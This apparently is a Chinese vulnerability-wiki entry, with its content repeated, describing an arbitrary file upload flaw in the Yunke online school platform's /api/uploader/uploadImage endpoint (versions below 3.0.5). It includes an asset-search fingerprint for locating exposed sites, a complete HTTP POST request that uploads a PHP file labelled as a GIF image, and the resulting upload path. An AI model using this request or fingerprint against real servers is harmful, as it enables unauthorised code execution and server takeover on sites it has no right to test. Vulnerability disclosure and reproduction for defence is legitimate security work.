fofamini-wiki

登录白背景

源码

云课网校系统uploadImage存在任意文件上传漏洞

一、漏洞简介

云课网校系统是一款开源在线教育网站平台，主要用于在线点播、在线直播、题库等功能，非常适合于个人和小型机构创建自己的在线教育网站。云课网校系统uploadImage存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

二、影响版本

<云课网校系统3.0.5

三、资产测绘

hunterweb.body="/static/libs/common/jquery.stickyNavbar.min.js"
官网

https://www.yunknet.cn

特征

四、漏洞复现

POST /api/uploader/uploadImage HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m
x-requested-with: XMLHttpRequest

------WebKitFormBoundaryLZbmKeasWgo2gPtU
Content-Disposition: form-data; name="file"; filename="1G3311040N.php"
Content-Type: image/gif

<?php phpinfo();?>
------WebKitFormBoundaryLZbmKeasWgo2gPtU--

上传文件位置

/upload/image/20231206/10f4784dc45961c0dc43cfdf3dd5fa75.php

原文: https://www.yuque.com/xiaokp7/ocvun2/yweikf3ua3bqf8p3

# 云课网校系统uploadImage存在任意文件上传漏洞

# 一、漏洞简介
云课网校系统是一款开源在线教育网站平台，主要用于在线点播、在线直播、题库等功能，非常适合于个人和小型机构创建自己的在线教育网站。 云课网校系统uploadImage存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

# 二、影响版本

- <云课网校系统3.0.5

# 三、资产测绘

- hunter`web.body="/static/libs/common/jquery.stickyNavbar.min.js"`
- 官网
```
https://www.yunknet.cn
```

- 特征

![image.png](./img/cBurOfQKSuXpB4iG/1701843721275-7832ba34-a01d-459c-91af-dfec06e47218-780694.png)

# 四、漏洞复现
```
POST /api/uploader/uploadImage HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m
x-requested-with: XMLHttpRequest

------WebKitFormBoundaryLZbmKeasWgo2gPtU
Content-Disposition: form-data; name="file"; filename="1G3311040N.php"
Content-Type: image/gif

<?php phpinfo();?>
------WebKitFormBoundaryLZbmKeasWgo2gPtU--
```
![image.png](./img/cBurOfQKSuXpB4iG/1701844094713-60d0326d-189d-4c33-ae01-9215c8dd0da1-146276.png)
上传文件位置
```
/upload/image/20231206/10f4784dc45961c0dc43cfdf3dd5fa75.php
```
![image.png](./img/cBurOfQKSuXpB4iG/1701844140580-d961fd3a-dc2b-42e0-b703-74c300034e85-159587.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yweikf3ua3bqf8p3>